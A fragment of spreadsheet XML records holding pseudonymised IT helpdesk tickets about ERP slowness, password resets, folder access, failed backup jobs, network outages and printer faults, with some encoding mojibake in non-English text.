    <s v="rechner fÃ¼r lÃ¤ngenmessmaschine uacyltoe hxgayczeen \xosdfhbu gtbfkisl"/>
    <s v="xosdfhbu gtbfkisl"/>
    <x v="24"/>
  </r>
  <r>
    <s v="pc name"/>
    <s v="_x000a__x000a_received from: koahsriq.wdugqatr@gmail.com_x000a__x000a_hello,_x000a_we need a new pc name_x000a_service tag of the pc is_x000a_fy80nkssc2_x000a__x000a_Ñ ÑƒÐ²Ð°Ð¶ÐµÐ½Ð¸ÐµÐ¼,_x000a_ÐµÐ²Ð³ÐµÐ½Ð¸Ñ._x000a__x000a__x000a_koahsriq wdugqatr,_x000a_administrative assistant._x000a_koahsriq.wdugqatr@gmail.com&lt;mailto:koahsriq.wdugqatr@gmail.com&gt;_x000a__x000a_company ooo | vavilova 5, corp.3 | russia, 119334 russia | www.company.com&lt;_x000a__x000a_"/>
    <s v="koahsriq wdugqatr"/>
    <x v="28"/>
  </r>
  <r>
    <s v=" delivery unable to ship out delivery"/>
    <s v="please provide the following: _x000a__x000a_what order number? customer order nor. 35946436_x000a__x000a_what material or item number? item 10  mm 4846674_x000a__x000a_what warehouse location? plant_108_x000a__x000a_issue description / error message?  the delivery quantety is 33 the picked quantety is 31  delivery note is booked but system says delivery is not picked yet_x000a_can not cancel... please help "/>
    <s v="cwrikael oanmsecr"/>
    <x v="12"/>
  </r>
  <r>
    <s v="pw reset for erp  - user name: pihddltzr123"/>
    <s v="_x000a__x000a_received from: iboltufk.ezfnvcqp@gmail.com_x000a__x000a_erp SID_34 account has been not unlocked successfully â€“ pw reset for erp  - user name: pihddltzr123_x000a__x000a_&quot;hi ,_x000a__x000a_unlocked the erp SID_34 account_x000a_please login with same password. -&gt; not working !!!!!_x000a__x000a_"/>
    <s v="iboltufk ezfnvcqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="kabel lan 10m liefern \gogtyekhan merdivan"/>
    <s v="kabel lan 10m liefern \gogtyekhan merdivan"/>
    <s v="qidgvtwa qvbutayx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="netweaver"/>
    <s v="cannot use it because of missing plugin"/>
    <s v="rwhqabon gjxemiyp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 response time too slow, transactions are being interrupted and erp connection is broken constantly"/>
    <s v="transactions are interrupted and erp connection is broken, constantly"/>
    <s v="ljynoupq zwlxjens"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please release access to \\HostName_705\teams\werkleitunggermany"/>
    <s v="_x000d__x000a__x000d__x000a_received from: byclpwmv.esafrtbh@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.jpg@01d22b85.01e698a0]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="byclpwmv esafrtbh"/>
    <x v="32"/>
  </r>
  <r>
    <s v="pls release access to \\HostName_705\lean\"/>
    <s v="_x000d__x000a__x000d__x000a_received from: byclpwmv.esafrtbh@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.jpg@01d22b84.b25aac90]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="byclpwmv esafrtbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reminder email notification keeps on sending for the approved pr"/>
    <s v="_x000d__x000a__x000d__x000a_received from: izwtdnfq.xptuoaid@gmail.com_x000d__x000a__x000d__x000a_hi it team,_x000d__x000a__x000d__x000a_i have still received the email notification reminder to approve 2 prs daily for the ones which i have already approved and there are no any pending prs left to approve in me55. also, pos have been raised by purchasing team._x000d__x000a__x000d__x000a_kindly review the system and fix for me. "/>
    <s v="izwtdnfq xptuoaid"/>
    <x v="29"/>
  </r>
  <r>
    <s v="slow erp"/>
    <s v="_x000a__x000a_received from: tejahd.easdwmdwrappa@company.com_x000a__x000a_help,_x000a__x000a_erp is very slow with disconnections. please resolve at the earliest._x000a__x000a_"/>
    <s v="xqoljzbh aydcwkxt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp slow down. few locations impacted, at least EU"/>
    <s v="erp slow down. few locations impacted, at least EU"/>
    <s v="hadbkvwt touedfyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="backup fÃ¼r rechner  lasplant_119\pfjwinbg ljtzbdqg"/>
    <s v="backup fÃ¼r rechner  lasplant_119\pfjwinbg ljtzbdqg"/>
    <s v="pfjwinbg ljtzbdqg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="pwkrlqbc zslqfmka"/>
    <x v="0"/>
  </r>
  <r>
    <s v="log in for erp is out of order"/>
    <s v="log in for erp is out of order"/>
    <s v="vncqjgzi tvalnycz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pls. help to run out dn against sto#5019358024, 3516494*37pcs,customer need them urgently~"/>
    <s v="pls. help to run out dn against sto#5019358024, 3516494*37pcs,customer need them urgently~"/>
    <s v="wktesmbp lorjymef"/>
    <x v="5"/>
  </r>
  <r>
    <s v="EU_tool funktioniert nicht mehr (EU_tool is not working)"/>
    <s v="EU_tool funktioniert nicht mehr"/>
    <s v="txkgmwbc qohmgwrp"/>
    <x v="25"/>
  </r>
  <r>
    <s v="*** urgent *** please reactive user id = dudyhuyv12"/>
    <s v="_x000a__x000a_received from: hupnceij.hyozjakb@gmail.com_x000a__x000a_hello all,_x000a_dudyhuyv12 is not active in password_management_tool, and australia can't access to windows â€¦_x000a__x000a_please can you check &amp; do what is necessary._x000a__x000a_thx !_x000a__x000a_[cid:image001.png@01d22b78.8e2efe40]_x000a__x000a_sincÃ¨res salutations, best "/>
    <s v="hupnceij hyozjakb"/>
    <x v="32"/>
  </r>
  <r>
    <s v="unable to open eps files "/>
    <s v="unable to open eps files "/>
    <s v="ckwfvyda saunmgqt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="netpath running from : HostName_1089 is having an issue reaching : portal.microsoftonline.com"/>
    <s v="received solarwind alert 2:38 am on 10/21 et_x000d__x000a__x000d__x000a_netpath running from : HostName_1089 is having an issue reaching : portal.microsoftonline.com_x000d__x000a__x000d__x000a_attached is the screen shot"/>
    <s v="jloygrwh acvztedi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="pw reset for erp - user name piltzrnj567    thank you!"/>
    <s v="_x000d__x000a__x000d__x000a_received from: iboltufk.ezfnvcqp@gmail.com_x000d__x000a__x000d__x000a_Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / with best "/>
    <s v="iboltufk ezfnvcqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2063 failed in job_scheduler at: 10/21/2016 02:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2063 failed in job_scheduler at: 10/21/2016 02:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="collaboration_platform nicht verfÃ¼gbar - kein internetzugriff"/>
    <s v="collaboration_platform nicht verfÃ¼gbar - kein internetzugriff"/>
    <s v="vdylwkbo hzlnrgat"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request authorization"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hkruyqfc.aouezihl@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_requesting you to provide me an authorization for the below mentioned programdnty._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d22b8f.406fc470]_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="hkruyqfc aouezihl"/>
    <x v="19"/>
  </r>
  <r>
    <s v="bex error"/>
    <s v="from: wgpimkle kijhcwur [mailto:wgpimkle.kijhcwur@gmail.com] _x000d__x000a_sent: friday, october 21, 2016 6:27 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rad:bex error_x000d__x000a__x000d__x000a_help desk_x000d__x000a__x000d__x000a__x000d__x000a_i got below error message when i ran rrmx through SID_37._x000d__x000a_please fix the issue._x000d__x000a_"/>
    <s v="wgpimkle kijhcwur"/>
    <x v="18"/>
  </r>
  <r>
    <s v="EU_tool funktioniert nicht"/>
    <s v="EU_tool funktioniert nicht"/>
    <s v="phedsjct lyphanue"/>
    <x v="25"/>
  </r>
  <r>
    <s v="job bkwin_search_server_prod_daily failed in job_scheduler at: 83.69.48.194 23:52:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_search_server_prod_daily failed in job_scheduler at: 83.69.48.194 23:52:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="reinecker wzs 60 r 241 abteilung kentip"/>
    <s v="pc fÃ¤hrt nach neustart nicht mehr hoch bzw. bricht wÃ¤hrend der hochfahrsequenz den bootvorgang ab, bitte Ã¼berprÃ¼fen, danke. "/>
    <s v="jfteqgyc ncazxobk"/>
    <x v="32"/>
  </r>
  <r>
    <s v="erp is too slow"/>
    <s v="name:zheqafyo bqirpxag_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:cowsvzel.ryhkefwv@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:erp is too slow _x000a__x000a__x000a_"/>
    <s v="cowsvzel ryhkefwv"/>
    <x v="13"/>
  </r>
  <r>
    <s v="users from various department are complaining slow response in erp, engineering tool, engineering tool, etc."/>
    <s v="users from various department are complaining slow response in erp, engineering tool, engineering tool, etc. &amp; unable to work."/>
    <s v="ythucdjx mujfrsyl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3052 failed in job_scheduler at: 83.69.48.194 23:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3052 failed in job_scheduler at: 83.69.48.194 23:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="circuit  outage:usa plant - (company) secondary vpn is down since 11:08 pm on 10/20 et.site up on primary global_telecom_1"/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________11:08 pm on 10/20 et______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __na_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___na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na____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _______na____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ______na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na___     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp SID_34 system down"/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi _x000a__x000a_plant_298 encounter erp SID_34 system down, due to this issue we may or may not able to fulfill (local) orders for today it depend on how fast the system will be up._x000a__x000a_i have raise it ticket inc1562584._x000a__x000a_nsdwd mwdddlleh_x000a_operation supervisor_x000a_company distribution services of asia pte ltd_x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="13"/>
  </r>
  <r>
    <s v="unable to check pay slip in hr_tool "/>
    <s v="unable to check pay slip in hr_tool "/>
    <s v="gbirhjat fptbrhwv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erpå¯†ç å¿˜è®° id: fenthgh45  erp password was forgotten"/>
    <s v="_x000a__x000a_received from: jmxqhrfa.vawptbfl@gmail.com_x000a__x000a_æ‚¨å¥½ï¼Œit_x000a__x000a_               erpå¯†ç å¿˜è®° id: fenthgh45  erp password was forgotten_x000a_               _x000a_               and self-service system password was forgotten, too._x000a_               é‡ç½®å¯†ç ç½‘ç«™ çš„ç™»å½•å¯†ç ä¹Ÿå¿˜è®°äº†_x000a_               even worse, all systems were locked._x000a_               å‡å·²ç»è¢«é”_x000a_               do me a fever to unlock them_x000a_               "/>
    <s v="jmxqhrfa vawptbfl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp runs very slow in apac"/>
    <s v="agents have to wait minutes for each operation of erp."/>
    <s v="zupifghd vdqxepun"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp response time is very slow"/>
    <s v="as we found that the erp response time (speed)  is very slow this morning,  please help chek and fix this issue aerp., "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="0"/>
  </r>
  <r>
    <s v="plant_298 erp SID_34 system slow"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000d__x000a__x000d__x000a_hi it team_x000d__x000a__x000d__x000a_kindly please assist to check, plant_298 encounter erp SID_34 system slow between 9am to 11:30am daily. "/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pls. help to check erp due to slow response,thx!"/>
    <s v="pls. help to check erp due to slow response,thx!"/>
    <s v="wktesmbp lorjymef"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_770_inc failed in job_scheduler at: 83.69.48.194 22:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_770_inc failed in job_scheduler at: 83.69.48.194 22:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_957 &amp; 662 fence"/>
    <s v="HostName_957 &amp; 662 fence are at 11 instead of 9"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="a termination for hwddwwd wdflefrong, 11175wdnwe363, effective 09/16/2016 has been approved. "/>
    <s v="a termination for hwddwwd wdflefrong, 11175wdnwe363, effective 09/16/2016 has been approved. "/>
    <s v="homsxpyw qgcsaymo"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job bkwin_HostName_768_inc failed in job_scheduler at: 83.69.48.194 21:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_768_inc failed in job_scheduler at: 83.69.48.194 21:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="terminate action for svfuhlnx aqrzskpg has completed"/>
    <s v="_x000d__x000a_a termination for svfuhlnx aqrzskpg, 11177614, effective 09/01/2016 has been approved. _x000d__x000a_"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="19"/>
  </r>
  <r>
    <s v="old emails"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pojhkxua.frpxtsca@gmail.com_x000d__x000a__x000d__x000a_how do i access my earlier work emails?_x000d__x000a_dell desktop doesn't pull up mails older than april 2015 !_x000d__x000a__x000d__x000a_"/>
    <s v="pojhkxua frpxtsca"/>
    <x v="27"/>
  </r>
  <r>
    <s v="job SID_39hotf failed in job_scheduler at: 83.69.48.194 20:50:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_39hotf failed in job_scheduler at: 83.69.48.194 20:50:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_37hotf failed in job_scheduler at: 83.69.48.194 20:47:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hotf failed in job_scheduler at: 83.69.48.194 20:47:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_38hotf failed in job_scheduler at: 83.69.48.194 20:48:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_38hotf failed in job_scheduler at: 83.69.48.194 20:48:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_564 failed in job_scheduler at: 83.69.48.194 20:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_backup statistics:_x000d__x000a_          _x000d__x000a_  session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........          2          _x000d__x000a_  failed disk agents ...........          0          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........          2          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          1          _x000d__x000a_  failed media agents ..........          3          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          4          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................     601 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          0 _x000d__x000a__x000d__x000a_job Job_564 failed in job_scheduler at: 83.69.48.194 20:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_79hot failed in job_scheduler at: 83.69.48.194 19:57:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_[major] from: bma@HostName_1302.hq.company.com &quot;lib6_drive10&quot;  time: 83.69.48.194 7:56:31 pm_x000d__x000a_[90:51]   /dev/rmt46.1_x000d__x000a_ cannot write to device ([5] i/o error)_x000d__x000a__x000d__x000a_job SID_79hot failed in job_scheduler at: 83.69.48.194 19:57:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_79hot failed in job_scheduler at: 83.69.48.194 19:19:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_79hot failed in job_scheduler at: 83.69.48.194 19:19:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="windows password reset request"/>
    <s v="windows password reset request"/>
    <s v="uyjcxkql amcvnfbs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_555 failed in job_scheduler at: 83.69.48.194 19:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_555 failed in job_scheduler at: 83.69.48.194 19:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="unable to log in to ethics"/>
    <s v="unable to log in to ethics"/>
    <s v="fsvnjexu yxaevupi"/>
    <x v="23"/>
  </r>
  <r>
    <s v="query to send a skype meeting"/>
    <s v="query to send a skype meeting"/>
    <s v="fsvnjexu yxaevupi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to home printer"/>
    <s v="unable to connect to home printer"/>
    <s v="wstxjbpv tjlncygd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder access required"/>
    <s v="_x000a_received from: naruedlk.mpvhakdq@gmail.com_x000a__x000a_dear it team,_x000a__x000a_please usa read and write access on the following two folders to me (dnqdqld)._x000a__x000a__x000a_\\HostName_645\departments\personal&lt;file:///\\HostName_645\departments\personal&gt;_x000a__x000a_\\HostName_753\departments\pesonal&lt;file:///\\HostName_753\departments\pesonal&gt;_x000a__x000a_"/>
    <s v="naruedlk mpvhakdq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="ticket update inplant_871302"/>
    <s v="ticket update inplant_871302"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue :ms crm dynamics"/>
    <s v="outlook issue :ms crm dynamics"/>
    <s v="gdnwlkit jokidavy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please usa sasqkjqh lwddkqddq access to printer cl74_ps per lpoebzsc grknswyo"/>
    <s v="please usa sasqkjqh lwddkqddq access to printer cl74_ps per lpoebzsc grknswyo"/>
    <s v="lpoebzsc grknswyo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password update query "/>
    <s v="password update query "/>
    <s v="gdnwlkit jokidavy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn query for user vvtdfettc67"/>
    <s v="vpn query for user vvtdfettc67"/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform - industrial"/>
    <s v="_x000d__x000a__x000d__x000a_received from: okmhzgcq.wzvetbqa@gmail.com_x000d__x000a__x000d__x000a_good afternoon â€“_x000d__x000a_can you please add a new library heading  ( talent review) to the library area.   can you also remove kristina cope as the owner of this portion of this page.  please use myself, mtdyuhki fdnrxaci and ifblxjmc dyrgfwbm to this page._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d22ae8.0c3cb4d0]_x000d__x000a__x000d__x000a_"/>
    <s v="okmhzgcq wzvetbqa"/>
    <x v="15"/>
  </r>
  <r>
    <s v="job SID_37hotf failed in job_scheduler at: 83.69.48.194 15:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hotf failed in job_scheduler at: 83.69.48.194 15:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="erp station in castings is not working."/>
    <s v="erp station in castings is not working."/>
    <s v="juaxnvwz reampilj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="dalmdwppi56 pc in castings is not working."/>
    <s v="dalmdwppi56 pc in castings is not working."/>
    <s v="ljpgedia bzqcwsgf"/>
    <x v="2"/>
  </r>
  <r>
    <s v="no boot"/>
    <s v="no boot"/>
    <s v="jinyluhq wpvelhtz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my outlook doesnÂ´t work. "/>
    <s v="in last fourth weeks i have same problem. i start outlook. outlook is opening but it doesnÂ´t open. it was 3 times fixed by our it service technician but it help always for one week and than  it appeares again. please help me to fix it. _x000a_my phone number is . i will be at home tomorrow afternoon  from 15:30. _x000a_"/>
    <s v="dismypxe zkwcmgsr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 : account lock out "/>
    <s v="erp SID_34 : account lock out "/>
    <s v="pizcefdg wkyxbgda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to get a delivery to create for 5019322902, mm# 7275831 "/>
    <s v="i believe apo is out of synch and cif programdnty may need to be run.  the sto was created 10/07/2016.  inventory received at 1:18 this afternoon.  next bop job is not scheduled until after 6 pm. this sto needs to ship before then. "/>
    <s v="khvzugxm yqfrcjwl"/>
    <x v="44"/>
  </r>
  <r>
    <s v="ticket update on inplant_871350"/>
    <s v="ticket update on inplant_871350"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="quoting engine:  error "/>
    <s v="quoting engine:  error "/>
    <s v="lagqkmto xqtldrcs"/>
    <x v="13"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="413475046745_x000a_reset outlook password for theecanse wdleell (his windows logon password is different since he doesn't log on to _x000a_company)"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="guest internet access."/>
    <s v="_x000a__x000a_received from: etnroabk.jkvshlfm@gmail.com_x000a__x000a_i am having trouble with getting internet guest access for the person below._x000a__x000a_skads wdlmdwwck_x000a_technician engineering - usa plant_x000a_etnroabk.jkvshlfm@gmail.com&lt;mailto:etnroabk.jkvshlfm@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="etnroabk jkvshlfm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="files on servers not available.  files cannot be opened.HostName_1326"/>
    <s v="details provided when trying to open a file only states &quot;the file is corrupt and cannot be opened.&quot;  multiple files noticed since wednesday, october 19, 2016, at plant_3 have become unavailable.  confirmation of unavailable files from different departments.  no e-mail of notice regarding any possible server changes."/>
    <s v="pkfvoucw yhmicuba"/>
    <x v="11"/>
  </r>
  <r>
    <s v="modem in the idg area is down at the usa plant"/>
    <s v=" contact # : _x000a_summary:modem in the idg area is down at the usa plant"/>
    <s v="zlpkfdox gzlciskf"/>
    <x v="3"/>
  </r>
  <r>
    <s v="interface 'serial0/0/0 and serial0/1/1:0 Â· connection to usa plant is  down since 12:45 pm et on 10/20."/>
    <s v="interface 'serial0/0/0 and serial0/1/1:0 Â· connection to usa plant is  down since 12:45 pm et on 10/20."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ad account locked out "/>
    <s v="ad account locked out "/>
    <s v="nacrbmxo ptbjlxar"/>
    <x v="0"/>
  </r>
  <r>
    <s v="multiple location across europe went down at 11:50am et on 10/20, please find the attached."/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___11:50am et on 10/20___________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___yes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yes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x v="7"/>
  </r>
  <r>
    <s v="citrix access. "/>
    <s v="_x000a__x000a_received from: lenxvcbq.vwnhjtoi@gmail.com_x000a__x000a_i am getting a certificate error trying to access hfyujqti jdcbiezxs. see attached._x000a__x000a__x000a__x000a_hddwdw lwdwdwdr_x000a_lenxvcbq.vwnhjtoi@gmail.com&lt;_x000a_"/>
    <s v="lenxvcbq vwnhjtoi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp SID_34 password reset request "/>
    <s v="erp SID_34 password reset request "/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="symantec pop query : ran quick scan and deleted cookies."/>
    <s v="symantec pop query : ran quick scan and deleted cookies."/>
    <s v="jhwgydeb ufiatosg"/>
    <x v="2"/>
  </r>
  <r>
    <s v="access to http:://bddjwwwdw/ for axcbfuqo yiagubvh"/>
    <s v="axcbfuqo yiagubvh no longer has access to http:://bddjwwwdw/. he needs access._x000a_please see the attached email from gilles._x000a__x000a_good morning,_x000a_there is a very long time that i did not contacted the team and youâ€¦.._x000a_i am in india for 2 weeks and work with the team using the new equipment._x000a_i need your help because i am not anymore able to be connected to: _x000a_ application where i was able to make a consultation._x000a_i received this following message._x000a_can you help to have this connection working again?_x000a_i have also the competitive databse but this is still working well._x000a_"/>
    <s v="axcbfuqo yiagubvh"/>
    <x v="25"/>
  </r>
  <r>
    <s v="unable to connect to outlook "/>
    <s v="unable to connect to outlook "/>
    <s v="wjslkzfr jxlbzwrp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error with customization (engineering tool) - erp plam and company tools"/>
    <s v="hi team, _x000a__x000a_i need your help with two error the customization the (engineering tool). the two errors attachment in ticket._x000a__x000a_erro computer: lpawty8515404 - diwhdd jwddkwor and lpawty8515494 - gsotqxfi lidunfjg_x000a__x000a__x000a__x000a_if you have more doubts please contatc me._x000a__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="45"/>
  </r>
  <r>
    <s v="job Job_3051 failed in job_scheduler at: 83.69.48.194 12:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3051 failed in job_scheduler at: 83.69.48.194 12:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="mobile device activation : company owned "/>
    <s v="_x000a_summary:need phone to connect to outlook"/>
    <s v="iehdjwvt rndtlyhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook outage"/>
    <s v="_x000a__x000a_received from: dxwuovgs.lmuxizht@gmail.com_x000a__x000a_hello,_x000a__x000a_is outlook down? i can't seem to connect on laptop remotely._x000a__x000a_please advise._x000a__x000a_sent from my iphone_x000a__x000a_dxwuovgs lmuxizht_x000a_sr. sales engineer_x000a_dxwuovgs.lmuxizht@gmail.com&lt;mailto:dxwuovgs.lmuxizht@gmail.com&gt;_x000a__x000a_"/>
    <s v="dxwuovgs lmuxizht"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent - please create tax code a0 in cc54yks09."/>
    <s v="please create tax code a0 in cc54yks09.this is really urgent, as we have to post vat inwarehouse_tool by the end of the week._x000a__x000a_background:_x000a_there was an export of goods from this location to germany (from plant_212 to plant_105)._x000a_delivery 9041183500, sto  -  5019291372, vat inwarehouse_tool 0461363360 â€“ is not posted in finance._x000a_"/>
    <s v="kxcawjet xmybdwfh"/>
    <x v="9"/>
  </r>
  <r>
    <s v="crm access issue"/>
    <s v="hi, poland cannot log into crm. all users in poland"/>
    <s v="utrvshcp bjlwcovt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 83.69.48.194 11:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 83.69.48.194 11:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="email license"/>
    <s v="i need to check on email license for production leads._x000a__x000a_28246727 dwwkd wdjwd usa wdnwk_x000a_28228474 wdwmd wdkfww usa whwdiuw_x000a_27144424 wdnwwl kwfwdw usa wdkwdwd"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can not sign into crm or single sign on portal on the hub. "/>
    <s v="can not sign into crm or single sign on portal on the hub. it states my password is not correct. this is the password i use for all other access points in company."/>
    <s v="uyjcxkql amcvnfbs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="qcehailo wqynckxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="calibration system printer"/>
    <s v="printer dymo labelwriter 450 turbo is not working, can't print calibration label for our gages."/>
